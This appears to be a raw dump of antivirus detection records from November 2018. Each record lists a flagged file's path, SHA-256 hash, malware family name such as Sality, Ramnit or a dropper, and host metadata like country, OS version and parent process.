  Row(detection=Row(filename='avscan-20181101-154019-9c63c07d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8528c76b\\AVSCAN-20181101-153614-64EAD598\\AVSCAN-20181101-154019-9C63C07D', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:40:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T17:00:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T20:30:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183835-9ea28086', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e458018\\AVSCAN-20181101-183714-933F3F21\\AVSCAN-20181101-183835-9EA28086', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:38:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='45c7249baeeaf3434ce18a12468b50b45f3a759d64e6da922555d7b684828a59', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\45C7249BAEEAF3434CE18A12468B50B45F3A759D64E6DA922555D7B684828A59', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='45c7249baeeaf3434ce18a12468b50b45f3a759d64e6da922555d7b684828a59', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:11:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aspnetca.exe', filepath='F:\\Windows\\winsxs\\x86_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_12f0dcb013147057\\aspnetca.exe', filesize=512000, name='W32/Sality.AG.#M1.#R1'), hash='45d1cc2c61230ff09f0422271b5a34e58914ebdf13d9ffb9b3b6b861243396f3', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:35:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aspnetca.exe', filepath='F:\\Windows\\winsxs\\x86_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_12f0dcb013147057\\aspnetca.exe', filesize=512000, name='W32/Sality.AG.#M1.#R1'), hash='45d1cc2c61230ff09f0422271b5a34e58914ebdf13d9ffb9b3b6b861243396f3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:51:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sndvol.exe', filepath='F:\\Windows\\System32\\SndVol.exe', filesize=768000, name='W32/Sality.AG.#M1.#R1'), hash='45d8128215ca763012aca9d3755bfd493a70592c95257debe73190393c1883c1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:47:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sndvol.exe', filepath='F:\\Windows\\System32\\SndVol.exe', filesize=768000, name='W32/Sality.AG.#M1.#R1'), hash='45d8128215ca763012aca9d3755bfd493a70592c95257debe73190393c1883c1', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:24:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sndvol.exe', filepath='F:\\Windows\\System32\\SndVol.exe', filesize=768000, name='W32/Sality.AG.#M1.#R1'), hash='45d8128215ca763012aca9d3755bfd493a70592c95257debe73190393c1883c1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:45:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='45e2f2defabfe8f2ff98ccd80603931581a31515fe0588da4b59d79160f9fef0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\45E2F2DEFABFE8F2FF98CCD80603931581A31515FE0588DA4B59D79160F9FEF0', filesize=176000, name='HTML/Infected.WebPage.Gen2.#M1.#R1'), hash='45e2f2defabfe8f2ff98ccd80603931581a31515fe0588da4b59d79160f9fef0', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:27:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bos_manage.exe', filepath='\\\\?\\C:\\Program Files\\BOSaNOVA Harel\\Bos_Manage.exe', filesize=344000, name='HEUR/APC.#M1.#R1'), hash='4672024f21ff8fc4ab5de1467761e7b0cfd4ae1fb2512bc7ea979843dcd9a133', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:03:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='46ad39ea3436e1a73207968f8d137f6078072924091b2ecd1ec328687b7e9de5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\46AD39EA3436E1A73207968F8D137F6078072924091B2ECD1EC328687B7E9DE5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='46ad39ea3436e1a73207968f8d137f6078072924091b2ecd1ec328687b7e9de5', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:24:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='47416a6a0029d7e4dc328f9831ec8e1eee7e79cfb1a9cf8273f68d61594971d4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\47416A6A0029D7E4DC328F9831EC8E1EEE7E79CFB1A9CF8273F68D61594971D4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='47416a6a0029d7e4dc328f9831ec8e1eee7e79cfb1a9cf8273f68d61594971d4', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='in_flac.dll', filepath='C:\\program files (x86)\\Winamp\\Plugins\\in_flac.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='474bf9b658f1a024044a0fbfcfcad245cc620266643b05412249d4afac532a22', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T07:07:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0024403.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{726DFCED-3DF5-404C-B3E0-BCC96F47927F}\\RP8\\A0024403.exe', filesize=768000, name='TR/Patched.Ren.Gen.#M300.#R5151'), hash='47746f0823a1adc0d5f9c750346e11a25a71e72594eb22b71850271c08ba9db2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:31:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nexustk.exe_25c88ee8d81e408c9fb88c09c1e79577.exe', filepath='C:\\Windows\\Installer\\{4D6DE8B6-B0A0-4F2C-BEBE-1FA024E7B951}\\NexusTK.exe_25C88EE8D81E408C9FB88C09C1E79577.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='47bca412c73d6068cf5373d9c2447a99619a7da7c632c9270b9a050af6595930', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T01:23:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nexustk.exe_25c88ee8d81e408c9fb88c09c1e79577.exe', filepath='C:\\Windows\\Installer\\{4D6DE8B6-B0A0-4F2C-BEBE-1FA024E7B951}\\NexusTK.exe_25C88EE8D81E408C9FB88C09C1E79577.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='47bca412c73d6068cf5373d9c2447a99619a7da7c632c9270b9a050af6595930', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T03:49:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nexustk.exe_25c88ee8d81e408c9fb88c09c1e79577.exe', filepath='C:\\Windows\\Installer\\{4D6DE8B6-B0A0-4F2C-BEBE-1FA024E7B951}\\NexusTK.exe_25C88EE8D81E408C9FB88C09C1E79577.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='47bca412c73d6068cf5373d9c2447a99619a7da7c632c9270b9a050af6595930', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T01:38:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bad piggies.exe', filepath='F:\\Loaders\\Source\\Indie\\Bad Piggies\\Bad Piggies.exe', filesize=1280000, name='HEUR/AGEN.1000290.#M1.#R1'), hash='47be55bcb6f2f128365fb3cfb79b46ebe58e743bfb1a32a6829fd43f7f240ce3', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4245280, timestamp='2018-11-01T12:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192945-58ad1ead', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab16be44\\AVSCAN-20181101-184303-2E317741\\AVSCAN-20181101-192945-58AD1EAD', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='47cfc01081109c4b441cc109030378b73fb44f74a87e4c4a12295cea35c1d899', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:29:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184410-3b6ccb38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab16be44\\AVSCAN-20181101-184303-2E317741\\AVSCAN-20181101-184410-3B6CCB38', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='47cfc01081109c4b441cc109030378b73fb44f74a87e4c4a12295cea35c1d899', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:44:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0371114.exe', filepath='\\\\?\\C:\\System Volume Information\\_restore{93F7CC16-D4B7-42F9-9F19-AAFEFA01B068}\\RP1593\\A0371114.exe', filesize=716000, name='ADWARE/BrowseFox.Gen.#M300.#R6112'), hash='482c8ff314930973eb8e2c082863e98e8da13fceaf2ec3513278d5850a8dcc47', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:07:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4840650fdc7ebe8d378d5e04174ee310f5f5b2c8444e2ba82743fea27c51f42f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\4840650FDC7EBE8D378D5E04174EE310F5F5B2C8444E2BA82743FEA27C51F42F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4840650fdc7ebe8d378d5e04174ee310f5f5b2c8444e2ba82743fea27c51f42f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='484dd4892ba00b143abb080f5d39015b91c6473d1b90c6ae87512d22fa7287dd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\484DD4892BA00B143ABB080F5D39015B91C6473D1B90C6AE87512D22FA7287DD', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='484dd4892ba00b143abb080f5d39015b91c6473d1b90c6ae87512d22fa7287dd', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:27:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='48660d76765a1cf9b8741baaba0961a6998b70726225527237b021ebecf264ac', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_17.10.2018-22.available\\Avira\\48660D76765A1CF9B8741BAABA0961A6998B70726225527237B021EBECF264AC', filesize=1224000, name='TR/Dropper.Gen.#M300.#R405'), hash='48660d76765a1cf9b8741baaba0961a6998b70726225527237b021ebecf264ac', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:10:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='489494dcf2a8596e3d4ec8b6b3f157f9c745394a6f607c6890ab344191ae8261', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.categorizing\\489494DCF2A8596E3D4EC8B6B3F157F9C745394A6F607C6890AB344191AE8261', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='489494dcf2a8596e3d4ec8b6b3f157f9c745394a6f607c6890ab344191ae8261', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:51:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='48a07d206766668dc64f4cb3d694cdb58b6e81ae049a68eaecee91bb82d17119.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\48A07D206766668DC64F4CB3D694CDB58B6E81AE049A68EAECEE91BB82D17119.VIR', filesize=328000, name='TR/Dropper.Gen.#M300.#R2295'), hash='48a07d206766668dc64f4cb3d694cdb58b6e81ae049a68eaecee91bb82d17119', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:31:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gps1200_vc8.dll', filepath='C:\\Program Files (x86)\\LEICA Geosystems\\GPS1200 Simulation\\Gps1200_VC8.dll', filesize=2048000, name='W32/Ramnit.CD.#M1.#R1'), hash='48e4acd39e8c939b012e29173038ea3bed25d9dcbeb4c23f053be6f1d4f3e04c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:29:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095133-d6fda507', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_896930d9\\AVSCAN-20181101-090957-DBAFAD60\\AVSCAN-20181101-095133-D6FDA507', filesize=508000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='48f06f52cb890c81fb601ed998ff4648ad6b3a57ac60f236c4a7aaa326be4090', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:51:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keygen.exe', filepath='D:\\civil\\مدني\\Progs\\ETABS 2015\\Keygen\\Keygen.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T21:17:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115008-1dacd1b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_051aad7c\\AVSCAN-20181101-114053-D04040A0\\AVSCAN-20181101-115008-1DACD1B5', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:50:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='etabs_2015.exe', filepath='C:\\Users\\X\\Desktop\\data\\pro\\New folder\\patches and cracks\\Etabs 2015 crack\\etabs_2015.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe4_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:11:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keygen.exe', filepath='\\\\?\\E:\\huong dan etabs\\CSI.ETABS.2015.v15.0.0.1221.x64_tailieuxd.com\\CSI.ETABS.2015.v15.0.0.1221.x64_tailieuxd.com\\Keygen\\Keygen.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T05:41:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231749-0f6a0307', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e05eca8a\\AVSCAN-20181101-231720-0BD7B32B\\AVSCAN-20181101-231749-0F6A0307', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:17:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='license generator.exe', filepath='D:\\civil\\مدني\\Progs\\ETABS 2015\\Crack\\License Generator.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T21:17:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231744-0ebbde2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e05eca8a\\AVSCAN-20181101-231720-0BD7B32B\\AVSCAN-20181101-231744-0EBBDE2B', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:17:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114954-1bb2ef00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_051aad7c\\AVSCAN-20181101-114053-D04040A0\\AVSCAN-20181101-114954-1BB2EF00', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:49:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114333-e691004a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_051aad7c\\AVSCAN-20181101-114053-D04040A0\\AVSCAN-20181101-114333-E691004A', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:43:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dccw.exe', filepath='\\\\?\\C:\\Windows\\System32\\dccw.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='49193d4bc4b9c36d7276bbc3a7c76021644443d2de535350c021afbd38e41c30', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dccw.exe', filepath='\\\\?\\C:\\Windows\\System32\\dccw.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='49193d4bc4b9c36d7276bbc3a7c76021644443d2de535350c021afbd38e41c30', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='neff-michael.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Neff-Michael.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='494a63825e6601449a227403d96e38e420501e8b9e0d9853426ba4e841cb34c4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172633-d730cffc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172633-D730CFFC', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='494a63825e6601449a227403d96e38e420501e8b9e0d9853426ba4e841cb34c4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:26:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:16:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:03:52Z'), dt=datetime.date(2018, 11, 1)),
